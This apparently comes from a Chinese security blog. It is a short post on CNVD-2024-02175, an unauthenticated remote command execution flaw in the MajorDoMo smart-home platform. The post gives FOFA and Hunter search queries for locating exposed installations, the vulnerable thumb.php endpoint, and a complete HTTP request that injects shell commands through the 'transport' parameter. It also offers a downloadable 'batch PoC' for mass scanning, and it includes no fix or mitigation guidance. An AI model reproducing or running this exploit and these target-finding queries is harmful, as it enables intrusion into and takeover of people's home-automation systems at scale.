CNVD-2024-02175-MajorDoMo RCE-批量poc

漏洞描述

MajorDoMo是一个开源的智能家居自动化平台,让用户可以通过一个中心控制系统管理各种智能设备和家居设施,该平台在MajorDoMo < 0662e5e版本存在未授权rce漏洞。

资产检索

FOFA:

title="MajordomoSL"

icon_hash="1903390397"



hunter:

web.title="MajordomoSL"

web.icon="08d30f79c76f124754ac6f7789ca3ab1"

漏洞位置

/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BD%5D%27%3B+id%3B+echo+%27%5BD%5D%27%29%23%3B

漏洞复现

请求包:

GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BD%5D%27%3B+id%3B+pwd%3B+echo+%27%5BD%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
CNVD-2024-02175-MajorDoMo RCE-批量poc

批量poc

CNVD-2024-02175-MajorDoMo RCE-批量poc
c25d15a0bc20240605154756.zip
zip文件
1.3K
© 版权声明
THE END
喜欢就支持一下吧
点赞7 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容